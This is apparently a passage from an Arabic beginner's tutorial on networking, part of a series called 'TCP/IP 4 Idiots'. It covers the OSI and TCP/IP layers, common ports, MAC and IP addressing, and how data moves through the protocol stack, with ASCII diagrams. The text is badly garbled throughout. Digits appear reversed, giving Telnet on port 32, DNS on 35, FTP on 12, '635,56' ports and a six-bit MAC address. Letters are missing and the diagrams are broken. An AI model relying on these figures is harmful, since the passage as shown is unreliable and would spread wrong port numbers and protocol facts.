‪ ....‬‬ ‫طبقة التطبیقات‪ ‬‬ ‫طبقة التطبیقات الطبقة الوحیدة التي يتفاعل معھا المستخدم ‪ ،‬وھي تقدم‪ ‬‬ ‫الخدمات مباشرة إلي التطبیقات ‪ .‬طبقة التبیطقات يمكنھا فحص الموارد‪ ‬‬ ‫المتبقیة‪ ،‬تزامن التصال‪ ،‬وتعريف اطراف التصال ‪ ..‬وتطبیقات ‪ TCP/IP‬العاملة‪ ‬‬ ‫في ھذه الطبقة ‪ .. POP3 ، SMTP ،Telnet ،FTP ..‬‬ ‫طبقة التمثیل ‪ ..‬‬ ‫طبقة التمثیل الطبقة الوحیدة التي يمكنھا تغییر البیانات في الرزمة ‪.‬وھي تھتم‬ ‫بتفاصیل التشفیر والتحويل والتأكد من أن البیانات المرسلة إلي الطرف الخر‪ ‬‬ ‫صالح للتعامل والقراءة في الطرف الخر ‪ ..‬وانواع البیانات في ھذه الطبقة‪ ‬‬ ‫تشمل ‪ 3.. JPEG,GIFF,TIFF,DOC,MPEG,MP‬‬ ‫عملیة ضغط وتشفیر البیانات قبل ارسال الرزمة تتم في ھذه الطبقة ‪ ...‬‬ ‫طبقةالجلسة ‪ ...‬‬ ‫ھ ذه الطبقة تتولي انشاء التصال وقطعھا بین طبقة التمثیل‪ ‬‬ ‫والخدمات التي تقوم بالطلبیات والجابة علي الطلبیات تتم ادارتھا بواسطة‪ ‬‬ ‫البروتوكولت الموجودة في ھذه الطبقة وھ ي تشمل بروتوكول معلومات المطقة‬ ‫‪ ,Information Protocol/ZIP Zone‬بروتوكول التحكم في الجلسة ‪ Session‬‬ ‫‪ Control Protocol/SCP‬و خدمة ‪ AppleTalk‬التي تدير خدمة ربط السماء ‪ ...‬‬ ‫‪ 34‬‬ ‫طبقة النقل ‪ :‬‬ ‫طبقة النقل مسئولة عن توفیر نقل موثوق للمعلومات عبر الشبكات ‪ ...‬‬ ‫وھ ي تكسب موثوقیة التصالت بطرق التیة ‪ :‬‬ ‫‪ - 1‬التحكم في التدقف ‪ : dataflow control‬وذلك حتي تكون سرعة ارسال‪ ‬‬ ‫البیانات من المرسل اسرع من سرعة معالجة المستقبل لھا ‪ .....‬‬ ‫‪ – 2‬المزج ‪ ،،Multiplexing‬لتمكین البیانات القادمة من تطبیقات مختلفة ان‪ ‬‬ ‫تتوضع في وصلة وحیدة ‪ .‬‬ ‫‪ - 3‬انشاء دوائر ظاھرية ‪Virtual Cuirct‬بین المضیفات المتصلة‪ ،‬حیث يتم‪ ‬‬ ‫انشاءھا وفصلھا من قبل ھذه الطبقة ‪ ..‬‬


‫‪ : 4‬فحص الخطاء ‪ Error checking‬من أجل الخطاء الواقعة أثناء النقل ‪ ..‬‬ ‫‪ : 5‬طلب ارسال البیانات التالفة ‪ ...‬‬ ‫والبروتوكول الساسي في مجموعة ‪ TCP/IP‬والقابعة في ھذه الطبقة ھي‪ ‬‬ ‫بروتوكول ‪ TCP‬نفسھا ‪ ...‬والفرق بین ‪ TCP‬و ‪ UDP‬التي تعتبر من بروتوكولت‪ ‬‬ ‫ھذه الطبقة‪ ،‬الفرق بینھما فخص الخطاء وتصحیحھا ‪ ....‬ولذلك تعتبر ‪ TCP‬‬ ‫بروتوكول موثوقا‪ ،‬اما ‪ UDP‬فبروتوكول غیر موثوق‪ ...‬‬ ‫منطقیا كل مضیف ( حاسوب ) يمكنه التعامل مع ‪ 635,56‬منفذ (‪ Port )2^61‬‬ ‫من أجل ‪TCP‬و ‪ . UDP‬وكل منفذ يمكن الوصول الیه من قبل برنامج واحد في‪ ‬‬ ‫وقت واحد‪ .‬فمثل مزود ‪ telnet‬يعمل مع منفذ ‪ TCP‬رقم ‪ ،32‬واذا كان المنفذ‪ ‬‬ ‫مشغول من طرف ‪ Telnet‬فل يستطیع استخدامھ ا برامج اخري ‪ .‬وبعض المنافذ‬ ‫من الممكن أن تكون مستعمل لكثر من برامج مثل منفذ ‪ 35‬الذي يستعمله‪ ‬‬ ‫مزود ‪ DNS‬وحصان طروادة الشھیرة ‪ ،Back Orifice‬يراقب منفذ معیا من اجل‪ ‬‬ ‫وصول البیانات او طلب التعامل من جھات اخري ‪ .‬والبرامج مثل ‪ PcAnyWhere‬‬ ‫يعمل في ھذا النمط ‪ .‬‬ ‫ولكن اذا أراد م دير الشبكة قید استخدام ‪ Telnet‬من الممكن ربطه بمنفذ آخر‪ ‬‬ ‫غیر المنفذ القیاسي ‪ . 32‬‬ ‫‪ 44‬‬ ‫بعض المنافذ العامة‪ ‬‬ ‫منافذ ‪ TCP‬‬ ‫‪ 12 ­ FTP‬‬ ‫‪ 32 ­ Telnet‬‬ ‫‪ 52 ­ SMTP‬‬ ‫‪ 35 ­ DNS‬‬ ‫منافذ ‪ UDP‬‬ ‫‪ 35 ­ DNS‬‬ ‫‪ 96 ­ TFTP‬‬ ‫‪ 161 ­ SNMP‬‬ ‫‪ 025 ­ RIP‬‬ ‫طبقة الشبكات ‪ Network Layer‬‬ ‫طبقة الشبكات يسمح بدمج وصلت معلومات متعددة في وصلة واحدة ‪ ...‬‬ ‫عادة بروتوكول ھ ذه الطبقة تعتبر بروتوكولت التوجیه ‪ Routing‬ومع ذلك ھناك‪ ‬‬ ‫بروتوكولت اخري في ھ ذه الطبقة ‪ .‬من بروتوكولت التوجیه ‪ :‬‬ ‫‪ Internet Protocol/IP‬و ‪ Open Shortest ،Border Gateway Protocol/BGP‬‬ ‫‪ Routing Information Protocol/RIP, Automatic Route ،First/OSPF Path‬‬ ‫‪ of the IP Protocol discovery subsets‬‬ ‫العناوين المنطقیة ‪ Logical Addresses‬‬ ‫العنوان المنطقي عنوان تعطي لبطاقة واجھ ة الشبكة‪ ،‬وبذلك يتمكن مدير‪ ‬‬ ‫الشبكة من معرف الشبكة التي ينتمي الیھا حاسوب ما‪ .‬‬ ‫ويسمح أيضا بتوفیر مضیف متعدد العناوين( التي تملك عنوان بروتوكول طبقة‪ ‬‬ ‫الشبكة ) التي بامكانه العمل بجسر للشبكة ‪ .‬‬ ‫طبقة ربط البیانات ‪ Data Link Layer :‬‬ ‫وظیفة ھ ذه الطبقة تقديم سبیل موثوق من اجل نقل البیانات في الشبكة‪ ،‬‬ ‫ويستخدم عنونة فیزيائیة من ترحیل البیانات الي العالم الخارجي‪ .‬وھذا الطبقة‬ ‫ايضا تستیطع تعريف طوبولوجیا الشبكة‪ .‬‬ ‫في الحقیقة ھ ذه الطبقة تتكون من طبقتین فرعییتن‪ ‬‬ ‫‪ 54‬‬ ‫الطبقة الفرعیة ‪ The LLC Sublayer‬‬ ‫طبقة التحكم في الربط المنطقي ‪ LLC‬تدير اكثر من اتصالت في وصلة شبكة‪ ‬‬ ‫وحیدة‪ .‬والمواصفات تم تحديدھا في ‪ IEEE 2.208‬والمواصفات تدعم التصال‪ ‬‬ ‫‪ .connection oriented services connectionless and‬‬


‫الطبقة الفرعیة ‪ The MAC Sublayer‬‬ ‫طبقة التحكم في الوصول تدير في وصول البروتوكول الي وسیط فیزيائي (‪ ‬‬ ‫العتاد) مثل كبل ايثرنت ‪ .‬مواصفات ‪ IEEE MAC‬تعرف عناوين ‪ MAC‬التي تعرف‪ ‬‬ ‫بالعنوان الفیزيائي والتي تمكن اكثر من جھاز في ھذه الطبقة ؟‪ .‬‬ ‫العناوين الفیزيائیة ‪ Physical Addresses‬‬ ‫العنوان الفیزيائي ھ و عنوان موجود في بطاقات مثل بطاقة ايثرنت‪ ،‬ويشبه الرقم‬ ‫التسلسلي ‪.‬وھو بطول ‪ 6‬بتات ويمثل بالستعشري ‪ .‬واول ثلث بايتات تستخدم‬ ‫للتعريف علي منتج البطاقة ‪ .‬وھذه البايتات الثلث تدمج مع البايتات الباقیة‪ ‬‬ ‫وتنتج منھ ا رقم معرف فريد للبطاقة ‪ .‬واذا نظرت في بطاقة واجھة الشبكة ‪ NIC‬‬ ‫سوف تري رقما مثل ھذه ‪ . FF A3 B0 A 4F 133‬واذا كان ھذا المیزة غیر‪ ‬‬ ‫موجودة في البطاقة‪ ،‬فالطريقة الوحیدة من اجل توجیه البیانات عبر الشبكات‪ ‬‬ ‫ھو اعطاء كل جھاز عنوانا ‪ TCP/IP‬او ‪ IPX/SPX‬فريدة ‪ .‬‬ ‫الطبقة الفیزيائیة ‪ The Physical Layer‬‬ ‫ھذه الطبقة مسئولة عن الحصول علي تدفق البتات ووضعھا في الطريق في‪ ‬‬ ‫العتاد الشبكي ‪ .‬‬ ‫والطبقات الفیزيائیة ‪ ،Physical‬ربط المعلومات ‪ ،Data­Link‬والشبكة‪ ‬‬ ‫‪ Networking‬كل ھذه الطبقة لیست خاصة بالشبكة من نوع ‪ LAN‬بل توجد في‬ ‫الشبكات واسعة النطاق ‪ WAN‬ايضا‪ .‬‬ ‫= مجموعة ‪ TCP/IP‬وطبقاتھا =‪ ‬‬ ‫تكلمنا عن طبقات ‪ ISO/OSI‬وأقسامھا ( تشمل كل مكونات الشبكة ولیست‪ ‬‬ ‫البروتوكولت فقط ) ‪ ،‬والن نتكلم عن الطبقات الخاصة بعائلة ‪ TCP/IP‬اي طبقات‬ ‫البروتوكولت ‪ ....‬‬ ‫مجموعة بروتوكولت ‪ TCP/IP‬بحد ذاتھا تم تطويرھا في شكل طبقات كل طبقة‪ ‬‬ ‫‪ 64‬‬ ‫مسؤولة عن جزء معین في عملیة التصال ككل‪ ..‬وكل طبقة تضم المزيج من‪ ‬‬ ‫البروكولت في ھذه المجموعة ‪ ..‬وھي اربع طبقات كما يلي‪ ‬‬ ‫‪Application Layer Telnet, FTP, e­mail, LPD SNMP TFTP SNMP Xwindow‬‬ ‫‪ .etc‬‬ ‫‪ Host to Host/Transport Layer TCP, UDP‬‬ ‫‪ Internet Layer IP RFC791, ICMP RFC792, IGMP, ARP,RARP‬‬ ‫‪ – 498Network Access Layer device driver and interface card, RFC‬‬ ‫‪ Ethernet, Token Ring,FDDI Ethernet/ Fast‬‬ ‫‪ DoD­TCP/IP Suit Model OSI Reference Model‬‬ ‫طبقة التطبیقات‪ ‬‬ ‫طبقة المعالجة والتطبیقات طبقة التمثیل‪ ‬‬ ‫طبقة الجلسة‪ ‬‬ ‫المضیف ‪ -‬المضیف طبقة النقل‪ ‬‬ ‫النترنت طبقة الشبكة‪ ‬‬ ‫الوصول الي الشبكة طبقة وصل البیانات‪ ‬‬ ‫الطبقة الفیزيائیة‪ ‬‬ ‫نلحظ ان ‪ OSI‬تضم طبقات زائدة ل تدخل في ضمن البروتوكولت ‪ ...‬‬ ‫يمكننا تقسیم البروتوكولت حسب وظیفتھا الى ثلث أقسام (ولیست‪ ‬‬ ‫الطبقات )‪ :‬‬ ‫‪ - 1‬بروتوكولت تطبیقات ‪ .Application Protocols‬‬ ‫‪ - 2‬بروتوكولت نقل ‪ .Transport Protocols‬‬ ‫‪ - 3‬بروتوكولت شبكة ‪ .Network Protocols‬‬ ‫تعمل بروتوكولت التطبیقات في الطبقات العلیا من ‪ Protocol Stack‬و تتلخص‪ ‬‬ ‫‪ 74‬‬ ‫مھمتھ ا في تبادل البیانات و تحقیق التفاعل بین التطبیقات و من أمثلتھا‪ :‬‬ ‫‪ )Server Message Block (SMB‬‬


‫‪ )Novell's NetWare Core Protocols (NCPs‬‬ ‫‪ )File Transfer Access and Management Protocol (FTAMP‬‬ ‫و من بروتوكولت التطبیقات الخاصة بالنترنت ‪ :‬‬ ‫‪ )File Transfer Protocol (FTP‬‬ ‫‪ Telnet‬‬ ‫أما بروتوكولت النقل فتستخدم لتوفیر جلسات التصال بین الكمبیوترات على‪ ‬‬ ‫الشبكة و ھ ي مسئولة عن صیانة جودة و دقة المعلومات المنقولة بین‪ ‬‬ ‫الجھزة‪ ،‬و من أمثلتھا‪ :‬‬ ‫الجزء الناقل من بروتوكول میكروسوفت ‪ .NWLink‬‬ ‫الجزء الناقل من بروتوكول ‪ NetBEUI‬‬ ‫‪ )Sequenced Packet Exchange (SPX‬‬ ‫‪ )Transmission Control Protocol(TCP‬‬ ‫بینما تقدم بروتوكولت الشبكة خدمات ربط ‪ Link Services‬و تتلخص مھامھا بما‬ ‫يلي‪ :‬‬ ‫‪ -1‬عنونة و توجیه المعلومات ‪ .Adressing/Routing‬‬ ‫‪ -2‬البحث عن إخطاء في عملیة الرسال ‪ .Error checking‬‬ ‫‪ -3‬التعامل مع طلبات إعادة الرسال ‪ .‬‬ ‫‪ -4‬تحديد قوانین التصال في بیئات محددة من الشبكات مثل إثرنت و ‪ Token‬‬ ‫‪ .Ring‬‬ ‫من المثلة على ھذه البروتوكولتما يلي‪ :‬‬ ‫‪ )Internet Protocol (IP‬‬ ‫‪ )Internet work Packet Exchange (IPX‬‬ ‫وكل طبقة لديھا عمل معین‪ ‬‬ ‫‪ - 1‬طبقة الوصل واحیانا تدعي طبقة ربط البیانات ‪ Dara­Link Layer‬او طبقة‪ ‬‬ ‫واجھة الشبكات ‪ Network Interface Layer‬تشمل عادة المشغل ‪ device‬‬ ‫‪ driver‬في نظام التشغیل وتقابل بطاقة واجھة الشبكة في الحاسوب‪ .‬والثنین‬ ‫معا تعالج كل ما تتطلب التعامل مع العتاد والوسائط ( السلك الخ ) ‪ ...‬‬ ‫‪ 84‬‬ ‫‪ - 2‬طبقة الشبكات تدعي احیانا ‪ Internet layer‬تعالج حركة الرزمة مسیرتھا‪ ‬‬ ‫في الشبكة مثل توجیه الرزم‪ ،‬وبروتوكولت مثل‪ ‬‬ ‫‪ ,IP/Internet Protocol, ICMP/Internet Message Control Protocol‬‬ ‫‪ IGMP/Internet Group Management Protocol‬تخدم في ھذه الطبقة مثل ‪...‬‬ ‫‪ - 3‬طبقة النقل تقوم بمعالجة سیر البیانات ‪ Flow of data‬بین الطرفین وتقدمھا‬ ‫لطبقة التطبیقات التي فوقھا ‪ ..‬وفي الحقیقة ھناك نوعان من بروتوكول النقل‪ ‬‬ ‫‪ TCP‬و ‪ . UDP‬‬ ‫‪ - 4‬طبقة التطبیقات تقوم بمعالجة تفاصیل البرامج ‪ ...‬مثل ‪ telnet,ftp,smtp‬الخ‪ ‬‬ ‫‪ 94‬‬ ‫‪TCP/IP 4 Idiots‬جزء الثاني‪ ‬‬ ‫للكاتب‪ SaD.jAcKAl:‬‬ ‫‪ TCP/IP‬تكملة لطبقات البروتوكولت‪ ‬‬ ‫كما قلنا سابقا نقسم ‪ TCP/IP‬حسب عملھا إلي أربع طبقات ونصیر علـي ھـذا‬ ‫التقسیم فیما يلي ‪ ....‬ونتكلم عن كل طبقة علي حدة وبشيء من التفصیل ‪..‬‬ ‫( كان من المفروض ان يكون ھذا المقال شرحا شامل للطبقات الربع ولكن بـض‬ ‫القراء طلبو تقسیم المقال الي جزئیات صغیرة ووولـذلك تـم تقـسیمه الـي عـدة‬ ‫اجزاء وتم تأخیر موضوع ‪ Subnetting‬إلي أجل آخر ‪ ( :D‬‬ ‫التكوين المنطقي لبسط عقدة في الشبكة كما يلي‪ ‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫‪ | | network applications‬‬ ‫|‪ | ‬‬ ‫|‪ |... / | \ .. / | \ ...‬‬


‫|‪ | ­­­­­ ­­­­­ ‬‬ ‫|‪ | ||TCP ||UDP ‬‬ ‫|‪ | ­­­­­ ­­­­­ ‬‬ ‫|‪ | \ / ‬‬ ‫|‪ | ­­­­­­­­ ‬‬ ‫‪ 05‬‬ ‫|‪ | | | IP ‬‬ ‫|‪ ­­­­­­*­ ­­­­­ | ‬‬ ‫|‪ | || |ARP ‬‬ ‫|‪ | ­­­­­ | ‬‬ ‫|‪ | | \ ‬‬ ‫|‪ | ­­­­­­ ‬‬ ‫|‪ | ||ENET ‬‬ ‫|‪ | ­­@­­­ ‬‬ ‫­­­­­­­­­­|­­­­­­­­­­­­­­­­­‪ ‬‬ ‫|‪ ‬‬ ‫‪ ­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­o‬‬ ‫‪ Ethernet Cable‬كبل ايثرنت‪ ‬‬ ‫الصورة ‪ – 1‬عقدة مبسطة لشبكة ‪ TCP/IP‬‬ ‫ھذا تكوين منطقي لعقدة أو جھ از في الشبكة تعتمد علي معمارية الطبقـات ‪...‬‬ ‫والتي تحدد سلوك ھذا الجھ از علي النترنت ‪ ...‬المربعات تمثـل مرحلـة معالجـة‬ ‫البیانات ‪ ,,‬والخطـوط توصـل المربعـات ترينـا الطريـق التـي تـسلكه البیانـات إلـي‬ ‫المام ‪ ..‬‬ ‫أما الخط الفقي في السفل فتمثل كبل ايثرنت‪ ،،‬و ‪O‬تمثل الـ ‪ Transceiver ..‬‬ ‫و النجمة * تمثل عنوان ‪ IP‬و@ تمثل عنوان ‪ Ethernet‬‬ ‫‪ 15‬‬ ‫=== بنیة وحدة بیانات المرسلة والمصطلحات‪ ‬‬ ‫‪ The formation of a transmitted unit of information‬‬ ‫رزم البیانات تنتقل من طبقة إلي أخرى فـي نمـوذج ‪ OSI‬حتـى الطبقـة الخیـرة‬ ‫تتعرض للتغییر‪ ،‬وھ ي إضافة ترويسات والتـذيیلت إلـي الـرزم ‪ .‬وفـي كـل طبقـة‬ ‫تسمي وحدة البیانات بأسماء مختلفة ‪ :‬‬ ‫الطبقة‪ ‬‬ ‫اسم الطبقة‬ ‫اسم وحدة البیانات‬ ‫‪ 7‬بیانات‪/‬معلومات المستخدم ‪ user data‬‬ ‫التطبیقات‬ ‫‪ 6‬بیانات ‪ data‬‬ ‫التمثیل‬ ‫‪ 5‬بیانات ‪ data‬‬ ‫الجلسة‬ ‫‪ 4‬مقطع ‪ segment‬‬ ‫النقل‬ ‫‪ 3‬رزمة ‪ packet‬‬ ‫الشبكة‬ ‫‪ 2‬إطار ‪ frame‬‬ ‫ربط البیانات‬ ‫‪ 1‬بتات‪/‬قناة بتات ‪ bit steam‬‬ ‫الفیزيائیة‬ ‫‪ Packet‬رزمة‪ ‬‬ ‫‪ Datagram‬جزئیة بیانات‪ ‬‬ ‫‪ Segment‬مطقع‪ ‬‬ ‫‪ Stream‬تیار‪ ‬‬ ‫‪ Frame‬إطار‪ ‬‬ ‫‪ data flow‬سريان البیانات‪ ‬‬ ‫‪ 25‬‬ ‫‪ Message‬رسالة‪ ‬‬ ‫وھنا بعض المصطلحات الخرى بالتفصیل‪ ‬‬ ‫جزئیة بیانات ‪ Datagram :‬رزمة المتواجدة في طبقة الـشبكات التـي تـستخدم‬ ‫خدمات الشبكة من نوع التصال الحقیقي ‪ .‬‬


‫الرسالة ‪ Message :‬تسمیة أخرى للبیانات المتواجدة فوق طبقة الشبكة‪ ،‬وأيضا‬ ‫ھذه الصطلح تطلق علي البیانات في طبقة التطبیقات ‪ .‬‬ ‫الخلیة ‪ Cell :‬وحدة بیانات التي تتواجد في طبقة ربط البیانات ‪ Data­Link‬وبطول‬ ‫متغیر‪ ،‬واغلب الحیان توجد في شبكات من نوع ‪ WAN‬مثل ‪ ATM ) 35‬بت )‪ .‬‬ ‫وحدة بیانات ‪ data unit‬‬ ‫‪:‬اصطلح عام للبیانات في أي طبقة كان‪.‬‬ ‫المشغل ‪ Driver :‬برنامج تقوم بالتصال مباشرة مع كرت واجھة الـشبكة مثـل‪ ‬‬ ‫‪ . Ethernet‬‬ ‫والنمـوذج ‪ Module‬برنـامج تقـوم بالتـصال مـع المـشغل‪ ،‬أو تطبیقـات الـشبكة‪ ‬‬ ‫‪Network Application‬أو مع نموذج آخر‪ ..‬‬ ‫فكما نري تاخذ وحدة بیانات ‪ data‬عدة اسماء مختلفة تبعا لموقعھا في مكـدس‬ ‫‪ TCP/IP‬‬ ‫في طبقة ايثرنت تدعي إطار ايثرنت‪ ،‬واذا كان بـین طبقـة ايثرنـت ونمـوذج ايبـي‬ ‫تـدعي رزمـة ‪ ،IP‬واذا كـان بـین نمـوذج ‪ IP‬ونمـوذج ‪ UDP‬تـدعي جزئیـة بیانـات‬ ‫ـ‪ ‬‬ ‫ـ‬ ‫ـ ـ‬ ‫ـ‬ ‫ـ‬ ‫ـ‬ ‫ـ‬ ‫ـ‬ ‫‪ ،datagram‬واذا كان بین نموذج ‪ IP‬ونمـوذج ‪ TCP‬تـدعي مطقـع ‪ ، TCP‬واذا كـان‬ ‫في طبقة تطبیقات الشبكة‪ ‬‬ ‫‪ 35‬‬ ‫تدعي رسالة تطبیق ‪... Applicatio Message‬للمزيد حول ھذه السـماء يمكنـك‬ ‫مراجعة الوثیقة المعنونة ‪ 2211RFC‬‬ ‫==== نظرة إلي تكوين عقدة في الشبكة من زاوية البروتوكولت‪ ...‬‬ ‫=== مسار البیانات في المكدس‪ ‬‬ ‫والن دعنا نتبع البیانات مـسارھا فـي المكـدس كمـا ھـي فـي الـصورة الولـى‪،‬‬ ‫البرنامج التي تعتمد علي ‪ TCP‬تمرر البیانات من طبقة التطبیقـات إلـي نمـوذج‪ ‬‬ ‫‪ ،TCP‬أما البرنامج التي تعتمد علي ‪ UDP‬تمررھا علي نموذج‪ .. UDP‬برامج ‪ FTP‬‬ ‫تعتبر مثل علي البرامج التي تعتمـد علـي‪ ، TCP‬والمكـدس فـي حالتھـا تكـون‪ ‬‬ ‫‪FTP/TCP/IP/Ethernet‬أما ‪ SNMP‬مثل تعتبر مثال علي البـرامج المعتمـدة علـي‬ ‫‪ UDP‬والمكدس في حالتھا تكون ‪ SNMP/UDP/IP/Ethernet‬‬ ‫‪ 1 2 3 ... n 1 2 3 ... n‬‬ ‫^‪ | \ / | || \ / ‬‬ ‫|‪ / ||\ | ||\ / ‬‬ ‫‪ ­­­­­­­­­­­­­ flow ­­­­­­­­­­­­­­­­ flow‬‬ ‫‪ ||multiplexer of ||de­multiplexer of‬‬ ‫‪ ­­­­­­­­­­­­­ data ­­­­­­­­­­­­­­­­ data‬‬ ‫|‪ | | | ‬‬ ‫|‪ | v | ‬‬ ‫‪ 45‬‬ ‫‪ 1 1‬‬ ‫الصورة الثانیة ‪ :‬المازجات والموزعات‪ ‬‬ ‫‪ n­to­1 multiplexer and 1­to­n de­multiplexer‬‬ ‫كمـا فـي الـصورةا الثانیـة نمـوذج ‪ TCP‬ونمـوذج ‪ UDP‬ومـشغل ‪ Ethernet‬تعتبـر‪ ‬‬ ‫‪Multiplexer‬مازجات ‪) 1– N ­ to‬أي تضع عدة قنـوات فـي قنـاة واحـدة مـن اجـل‬ ‫إرسالھا إلي الخارج ) ‪ ....‬‬ ‫وتعتبـر موزعـات ‪ De­Multiplexer‬أيـضا ‪ 1­ to­ n‬فـي نفـس الوقـت ( أي تـوزع‬ ‫ـ‪ ‬‬ ‫ـ‬ ‫ـ‬ ‫ـ‬ ‫ـ‬ ‫ـ‬ ‫ـ‬ ‫البیانات الواردة في قناة واحدة إلي عدة قنوات )‪ ‬‬ ‫والن ‪ :‬فلنقــل أن ھنــاك بیانــات واردة‪ ،،‬أول محطتھــا ســتكون ايثرنــت ( وھنــا‬ ‫تسمي إطار‪ ( Ethernet Frame‬ومشغل ايثرنت تقوم بتمريرھا إلي العلى ‪ ،‬أما‬ ‫نموذج بروتوكول‪ ARP‬حل العناوين أو نموذج بروتوكول‪ IP‬فـي حقـل النـوع ‪ Type‬‬ ‫في إطار ايثرنت تحدد فیما إذا كانت تمررالي ‪ ARP‬أو‪ IP‬‬ ‫فلنقل أن البیانات مررت إلي نموذج ‪ ، IP‬و ‪ IP‬تقوم بـدورھا بتمريـر البیانـات إلـي‬


‫العلـى ‪ TCP‬أو ‪ UDP‬حـسبما تخبرھـا حقـل ‪ Protocol‬فـي ترويـسة ‪ IP‬لـرزم‬ ‫البیانات ‪ ..‬‬ ‫فلنقـل أنھ ـا أي البیانـات مـررت إلـى نمـوذج‪ ،، UDP‬وتـسمي ھنـا ‪ Application‬‬ ‫‪Message‬وبدورھ ا تمرر إلي تطبیق الشبكة حسبما تخبرھا حقـل المنفـذ ‪ Port‬‬ ‫في ترويسة الرزمة ‪ ...‬‬ ‫‪ 55‬‬ ‫وإذا مررت إلى ‪ TCP‬بنفس الشكل تمرر إلى تطبیق الشبكة حسب حقـل ‪ Port‬‬ ‫في ترويسة‪ TCP ..‬‬ ‫عملیة المـزج ( مـزج بیانـات القنـوات القادمـة مـن اعلـي الطبقـة إلـي الطبقـات‬ ‫السفلي ) سھ لة نسبا ‪ ..‬فكـل نمـوذج‪ /‬بروتوكـول تقـوم بإضـافة ترويـسة‪/‬نھايـة‬ ‫خاصة بھا إلى رزمة البیانات ‪ ..‬وبذلك يمكن توزيعھ ا في الطرف الخر ‪ ...‬‬ ‫البیانات القادمة مـن بـرامج تطبیقـات الـشبكة تمـرر سـواء إلـى ‪ TCP/UDP‬إلـى‬ ‫السفل ‪ ،‬فنموذج ‪ IP‬وأخیرا الطبقة الفیزيائیة ‪ Network Interface Driver‬مثـل‪ ‬‬ ‫‪ .. Ethernet‬‬ ‫وغني عن الذكر‪ ،‬أن تقنیة إنترنت تدعم أنواع عتاد مختلفة للشبكات‪ ،،‬واليثرنت‬ ‫تعتبر اكثر شیوعا في الشبكات الفیزيائیة ‪ ...‬‬ ‫الجھاز في صورة رقـم بـــ لـديھا واجھ ـة‪ /‬اتـصال ايثرنـت واحـدة ‪ ....‬وبـذلك لـديھا‬ ‫عنـوان ايثرنـت أو ‪ MAC Address‬مكونـة مـن ‪ 6‬بايتـات‪ ،‬اي ‪ 84‬بتـات‪ 42 ...‬منھـا‬ ‫رقم تعريف خاص للشركة المنتجة ‪ ..‬‬ ‫ونفس الجھاز لديھا عنوان ‪ IP‬مكونة من ‪ 4‬بتات كما ذكرنا أعـله ‪ ..‬ھـذا العنـوان‬ ‫تتواجد في المكدس في اسفل نموذج‪ ، IP‬وتكون لكل جھاز في النترنت عنوان‪ ‬‬ ‫‪IP‬وحید ‪ .‬‬ ‫والجھ ـاز المتـصل بالنترنـت دائمـا تعـرف عنوانھـا الخـاص سـواء عنـوان ‪ IP‬أو‪ ‬‬ ‫ـ‪ ‬‬ ‫ـ‬ ‫ـ‬ ‫ــ‬ ‫ـ ـ‬ ‫ـ‬ ‫ـ‬ ‫‪ ... Ethernet‬‬ ‫( لحظ أننا نتكلم عن جھ از متصل بشبكة أي عن عقدة ما في الشبكة ‪ ) ...‬‬ ‫والن نأخذ شكل آخر للجھاز ‪ ....‬‬ ‫الجھ از إذا كان متصل إلى بطاقتین ايثرنت ستكون كما يلي المكدس‪ ‬‬ ‫‪ 65‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫|‪| network applications ‬‬ ‫|‪ | ‬‬ ‫|‪ |... \ | / .. \ | / ...‬‬ ‫|‪ | ­­­­­ ­­­­­ ‬‬ ‫|‪ | |TCP| |UDP| ‬‬ ‫|‪ | ­­­­­ ­­­­­ ‬‬ ‫|‪ | \ / ‬‬ ‫|‪ | ­­­­­­­­ ‬‬ ‫|‪ | | IP | ‬‬ ‫|‪ | ­­­­­ ­*­­­­*­ ­­­­­ ‬‬ ‫|‪ | |ARP| | | |ARP| ‬‬ ‫|‪ | ­­­­­ | | ­­­­­ ‬‬ ‫|‪ | \ | | / ‬‬ ‫|‪ | ­­­­­­ ­­­­­­ ‬‬ ‫|‪| |ENET| |ENET| ‬‬ ‫|‪ | ­­­@­­ ­­­@­­ ‬‬ ‫­­­­­­­­­|­­­­­­­|­­­­­­­­­­‪ ‬‬ ‫|‪ | ‬‬ ‫‪ 57‬‬ ‫‪ | ­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­o‬‬


‫‪ | 2 Ethernet Cable‬‬ ‫‪ ­­­­­­­­­­­­­­­­­­­­­­­­­o‬‬ ‫‪ 1 Ethernet Cable‬‬ ‫ت‪ ‬‬ ‫الصورةالثالثة ‪ :‬عقدة شبكة مع ‪ 2‬بطاقة ايثرنت‬ ‫لحظ أن ھذا الجھاز لديه واجھ تین شبكة ‪ ..‬أي بطاقتین ايثرنت ‪ ...‬وبـذلك تـصبح‬ ‫ح‬ ‫‪ Ethernet‬‬ ‫‪E‬‬ ‫لديھا زوجا من عنوان ‪ IP‬وزوجا من عنوان‪..‬‬ ‫‪ m ­ to ­ n‬‬ ‫‪m‬‬ ‫وفي ھذه الحالة نموذج ‪ IP‬تعتبر مازج ‪n ­ to ­ m‬وموزع المزج‬ ‫‪1 2 3 ... n 1 2 3 ... n‬‬ ‫^‪ || \ / | || \ / ‬‬ ‫|‪ ||\ / | ||\ / ‬‬ ‫‪ ­­­­­­­­­­­­­ flow ­­­­­­­­­­­­­­­­ flow‬‬ ‫‪ ||multiplexer of ||de­multiplexer of‬‬ ‫‪ ­­­­­­­­­­­­­ data ­­­­­­­­­­­­­­­­ data‬‬ ‫|‪ ||/ \ | ||/ \ ‬‬ ‫|‪ || / \ v || / \ ‬‬ ‫‪ 1 2 3 ... m 1 2 3 ... m‬‬ ‫الصورة الرابعة ‪ :‬المازجات والموزعات المتعددة ‪ ::‬‬ ‫‪ 85‬‬ ‫‪n­to­m multiplexer and m­to­n de­multiplexer‬‬ ‫‪ TCP UDP‬‬ ‫‪ \ /‬‬ ‫‪ \ /‬‬ ‫­­­­­­­­­­­­­­‪ ‬‬ ‫|‪ | IP ‬‬ ‫|‪ | ‬‬ ‫|‪ | ­­­ ‬‬ ‫|‪ | / \ ‬‬ ‫|‪ | / v ‬‬ ‫­­­­­­­­­­­­­­‪ ‬‬ ‫\‪ / ‬‬ ‫\‪ / ‬‬ ‫‪ data data‬‬ ‫‪ 59‬‬ ‫‪ comes in goes out‬‬ ‫‪ here here‬‬ ‫‪ IP‬‬ ‫الصورةالخامسة ‪ :‬تمرر رزمة ‪I‬‬ ‫‪ Example of IP Forwarding a IP Packet‬‬ ‫‪، Forwarding‬‬ ‫‪F‬‬ ‫وعملیـة إرسـال رزم ‪ IP‬إلـى شـبكة خارجیـة تـسمي 